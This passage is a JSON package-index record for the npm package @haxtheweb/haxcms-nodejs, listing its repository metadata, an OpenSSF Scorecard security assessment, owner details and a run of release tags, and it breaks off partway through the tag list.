{"id":10386896,"name":"@haxtheweb/haxcms-nodejs","ecosystem":"npm","description":"HAXcms single and multisite nodejs server, api, and administration","homepage":"https://hax.psu.edu/","licenses":"Apache-2.0","normalized_licenses":["Apache-2.0"],"repository_url":"https://github.com/haxtheweb/haxcms-nodejs","keywords_array":["haxtheweb","haxcms","haxsite","htw","webcomponents","lit"],"namespace":"haxtheweb","versions_count":61,"first_release_published_at":"2024-06-17T20:48:11.032Z","latest_release_published_at":"2026-08-14T21:17:09.773Z","latest_release_number":"26.8.1","last_synced_at":"2026-10-02T10:08:06.278Z","created_at":"2024-06-17T20:50:11.104Z","updated_at":"2026-10-02T14:18:38.797Z","registry_url":"https://www.npmjs.com/package/@haxtheweb/haxcms-nodejs","install_command":"npm install @haxtheweb/haxcms-nodejs","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"26.8.1"},"contentPolicy":null},"repo_metadata":{"id":244844566,"uuid":"816462904","full_name":"haxtheweb/haxcms-nodejs","owner":"haxtheweb","description":"HAX + CMS to manage your microsite universe with NodeJS backend","archived":false,"fork":false,"pushed_at":"2026-09-24T14:26:09.000Z","size":46842,"stargazers_count":4,"open_issues_count":1,"forks_count":16,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-09-25T12:52:52.740Z","etag":null,"topics":["cms","education","haxtheweb","lit","oer","webcomponents","website"],"latest_commit_sha":null,"homepage":"https://haxtheweb.org/documentation","language":"JavaScript","has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/haxtheweb.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":".github/CODEOWNERS","security":"SECURITY.md","support":"SUPPORT.md","governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":null,"gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null}},"created_at":"2024-06-17T20:05:03.000Z","updated_at":"2026-09-24T14:26:18.000Z","dependencies_parsed_at":"2026-09-17T15:22:39.277Z","dependency_job_id":null,"html_url":"https://github.com/haxtheweb/haxcms-nodejs","commit_stats":{"total_commits":113,"total_committers":1,"mean_commits":113.0,"dds":0.0,"last_synced_commit":"6db3ce94f418665dd25e48b42e64c0f6465c3123"},"previous_names":["haxtheweb/haxcms-nodejs"],"tags_count":72,"template":false,"template_full_name":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/haxtheweb","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/sbom","scorecard":{"id":1242298,"data":{"date":"2026-01-23T20:28:23Z","repo":{"name":"github.com/haxtheweb/haxcms-nodejs","commit":"1ccbbf6c971cf241a4f9a04e2d4d1a6e103bb925"},"scorecard":{"version":"v5.3.0","commit":"c22063e786c11f9dd714d777a687ff7c4599b600"},"score":5.7,"checks":[{"name":"Code-Review","score":1,"reason":"Found 2/11 approved changesets -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/c22063e786c11f9dd714d777a687ff7c4599b600/docs/checks.md#code-review"}},{"name":"Maintained","score":10,"reason":"25 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/c22063e786c11f9dd714d777a687ff7c4599b600/docs/checks.md#maintained"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/c22063e786c11f9dd714d777a687ff7c4599b600/docs/checks.md#packaging"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/c22063e786c11f9dd714d777a687ff7c4599b600/docs/checks.md#security-policy"}},{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/c22063e786c11f9dd714d777a687ff7c4599b600/docs/checks.md#dependency-update-tool"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/c22063e786c11f9dd714d777a687ff7c4599b600/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/build.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/cla.yml:11","Warn: topLevel 'statuses' permission set to 'write': .github/workflows/cla.yml:13","Warn: topLevel 'actions' permission set to 'write': .github/workflows/cla.yml:10","Info: topLevel permissions set to 'read-all': .github/workflows/ossf_scorecard.yml:14","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/c22063e786c11f9dd714d777a687ff7c4599b600/docs/checks.md#token-permissions"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/c22063e786c11f9dd714d777a687ff7c4599b600/docs/checks.md#cii-best-practices"}},{"name":"Binary-Artifacts","score":9,"reason":"binaries present in source code","details":["Warn: binary detected: src/public/build/es6/node_modules/@haxtheweb/voice-recorder/lib/vmsg.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/c22063e786c11f9dd714d777a687ff7c4599b600/docs/checks.md#binary-artifacts"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/c22063e786c11f9dd714d777a687ff7c4599b600/docs/checks.md#vulnerabilities"}},{"name":"Pinned-Dependencies","score":2,"reason":"dependency not pinned by hash detected -- score normalized to 2","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/build.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/haxtheweb/haxcms-nodejs/build.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/build.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/haxtheweb/haxcms-nodejs/build.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/build.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/haxtheweb/haxcms-nodejs/build.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cla.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/haxtheweb/haxcms-nodejs/cla.yml/main?enable=pin","Warn: containerImage not pinned by hash: src/boilerplate/site/Dockerfile:1","Warn: containerImage not pinned by hash: src/boilerplate/site/Dockerfile:3: pin your Docker image by updating php:7.3-apache to php:7.3-apache@sha256:b9872cd287ef72bc17d45d713aa2742f3d3bcf2503fea2506fd93aa94995219f","Warn: containerImage not pinned by hash: src/boilerplate/site/custom/Dockerfile:1","Warn: containerImage not pinned by hash: src/boilerplate/site/custom/Dockerfile:3: pin your Docker image by updating node:12 to node:12@sha256:01627afeb110b3054ba4a1405541ca095c8bfca1cb6f2be9479c767a2711879e","Info:   3 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   2 third-party GitHubAction dependencies pinned","Info:   0 out of   4 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/c22063e786c11f9dd714d777a687ff7c4599b600/docs/checks.md#pinned-dependencies"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 22 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/c22063e786c11f9dd714d777a687ff7c4599b600/docs/checks.md#sast"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/c22063e786c11f9dd714d777a687ff7c4599b600/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/c22063e786c11f9dd714d777a687ff7c4599b600/docs/checks.md#signed-releases"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: Apache License 2.0: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/c22063e786c11f9dd714d777a687ff7c4599b600/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/c22063e786c11f9dd714d777a687ff7c4599b600/docs/checks.md#fuzzing"}},{"name":"Contributors","score":10,"reason":"project has 4 contributing companies or organizations","details":["Info: found contributions from: elmsln, haxtheweb, penn state, psudug"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/c22063e786c11f9dd714d777a687ff7c4599b600/docs/checks.md#contributors"}},{"name":"CI-Tests","score":10,"reason":"3 out of 3 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/c22063e786c11f9dd714d777a687ff7c4599b600/docs/checks.md#ci-tests"}}]},"last_synced_at":"2026-01-24T09:40:58.103Z","repository_id":244844566,"created_at":"2026-01-24T09:40:58.103Z","updated_at":"2026-01-24T09:40:58.103Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":342542704,"owners_count":37929327,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-10-02T02:00:07.254Z","response_time":104,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"haxtheweb","name":"HAX The Web","uuid":"170651362","kind":"organization","description":"Tools","email":"hax@psu.edu","website":"https://hax.psu.edu/","location":"United States of America","twitter":"haxtheweb","company":null,"icon_url":"https://avatars.githubusercontent.com/u/170651362?v=4","repositories_count":44,"last_synced_at":"2026-04-28T18:33:52.567Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/haxtheweb","funding_links":[],"total_stars":662,"followers":31,"following":0,"created_at":"2024-05-29T11:01:33.255Z","updated_at":"2026-04-28T18:33:52.567Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/haxtheweb","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/haxtheweb/repositories"},"tags":[{"name":"26.8.1","sha":"f08c164ceea5245d846924467054682a1346a753","kind":"commit","published_at":"2026-08-14T21:16:54.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/26.8.1","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/26.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@26.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/26.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/26.8.1/manifests"},{"name":"26.8.0","sha":"f08c164ceea5245d846924467054682a1346a753","kind":"commit","published_at":"2026-08-14T21:16:54.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/26.8.0","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/26.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@26.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/26.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/26.8.0/manifests"},{"name":"v26.8.1","sha":"f08c164ceea5245d846924467054682a1346a753","kind":"tag","published_at":"2026-08-14T21:16:54.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v26.8.1","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v26.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v26.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v26.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v26.8.1/manifests"},{"name":"v26.0.1","sha":"88d9eab5550e4e9a53d3e26ab67eb13dbbbaf95d","kind":"tag","published_at":"2026-05-21T20:31:49.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v26.0.1","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v26.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v26.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v26.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v26.0.1/manifests"},{"name":"26.0.0","sha":"9c754cb4c82f8b601d29b0a972e63b7c52d045c0","kind":"commit","published_at":"2026-05-12T19:56:59.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/26.0.0","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/26.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@26.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/26.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/26.0.0/manifests"},{"name":"v26.0.0","sha":"284da1031ffac3fa9846b1a5250c06bfebfd070e","kind":"tag","published_at":"2026-05-12T19:53:43.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v26.0.0","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v26.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v26.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v26.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v26.0.0/manifests"},{"name":"v25.0.0","sha":"1f361caf8f17b0547be9acc46a4e240ee5e1431b","kind":"tag","published_at":"2026-01-09T18:10:28.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v25.0.0","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v25.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v25.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v25.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v25.0.0/manifests"},{"name":"v11.0.15","sha":"2222822cbb6bd8f2979481a89b8344db6438cec0","kind":"tag","published_at":"2025-07-24T19:07:22.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v11.0.15","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v11.0.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v11.0.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v11.0.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v11.0.15/manifests"},{"name":"v11.0.14","sha":"a8274605f58e77cd60a0b93438d016fd47d93fb6","kind":"tag","published_at":"2025-07-23T20:45:57.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v11.0.14","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v11.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v11.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v11.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v11.0.14/manifests"},{"name":"v11.0.13","sha":"28435994e3b0ab1eea296407b38180899176642d","kind":"tag","published_at":"2025-07-21T20:35:08.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v11.0.13","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v11.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v11.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v11.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v11.0.13/manifests"},{"name":"v11.0.12","sha":"7b0ad1af1b7d44e6c278f71ec01eddc736d041f7","kind":"tag","published_at":"2025-07-21T20:21:46.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v11.0.12","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v11.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v11.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v11.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v11.0.12/manifests"},{"name":"v11.0.11","sha":"bb22b6d7e026e0afd2667de0a6ef0eff5431d876","kind":"tag","published_at":"2025-07-21T20:07:06.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v11.0.11","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v11.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v11.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v11.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v11.0.11/manifests"},{"name":"v11.0.10","sha":"387dc06d7579c66c5dbaa7561f2e48163b0fdb16","kind":"tag","published_at":"2025-07-21T18:57:01.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v11.0.10","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v11.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v11.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v11.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v11.0.10/manifests"},{"name":"v11.0.9","sha":"a889549fe6b9c9fef3d49d574fd4d1c5a8a2966f","kind":"tag","published_at":"2025-07-21T18:01:36.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v11.0.9","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v11.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v11.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v11.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v11.0.9/manifests"},{"name":"v11.0.8","sha":"3818d34c64e68f50e4bbe69278dce98669114cce","kind":"tag","published_at":"2025-07-21T16:57:48.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v11.0.8","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v11.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v11.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v11.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v11.0.8/manifests"},{"name":"v11.0.7","sha":"ddd93fe352363b7b191a969a58f7cdd06e918024","kind":"tag","published_at":"2025-07-21T15:43:05.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v11.0.7","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v11.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v11.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v11.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v11.0.7/manifests"},{"name":"v11.0.6","sha":"d03eaf21de065a264dca98cf7a55c4716502de87","kind":"tag","published_at":"2025-07-11T15:29:09.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v11.0.6","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v11.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v11.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v11.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v11.0.6/manifests"},{"name":"v11.0.5","sha":"ca4d558e1567aa26d2215b94fb628bf9167a2c5e","kind":"tag","published_at":"2025-06-18T16:03:36.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v11.0.5","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v11.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v11.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v11.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v11.0.5/manifests"},{"name":"v11.0.4","sha":"9dc6421c11938090543b8f9ce58af1caf5d7dbb4","kind":"tag","published_at":"2025-06-10T15:55:46.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v11.0.4","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v11.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v11.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v11.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v11.0.4/manifests"},{"name":"v11.0.3","sha":"150773eb8b5abd97fa8eacdd74d21bd2d2da4c62","kind":"tag","published_at":"2025-06-09T15:44:56.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v11.0.3","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v11.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v11.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v11.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v11.0.3/manifests"},{"name":"v11.0.2","sha":"b970f827d57db97c25784764be8a66096fdc05c6","kind":"tag","published_at":"2025-06-06T16:26:36.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v11.0.2","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v11.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v11.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v11.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v11.0.2/manifests"},{"name":"v11.0.1","sha":"1b836f047b8d3210cafc2e1d0068f3aa112fe012","kind":"tag","published_at":"2025-06-06T14:51:29.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v11.0.1","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v11.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v11.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v11.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v11.0.1/manifests"},{"name":"v11.0.0","sha":"20efb09f99720e255d3ec0d134213d029b0db216","kind":"tag","published_at":"2025-06-06T14:43:45.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v11.0.0","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v11.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v11.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v11.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v11.0.0/manifests"},{"name":"v10.0.6","sha":"f6d76e9ddf709ad8b4a45b410dad3ce430af2814","kind":"tag","published_at":"2025-04-07T19:30:59.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v10.0.6","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v10.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v10.0.6","tag_url":"https://repos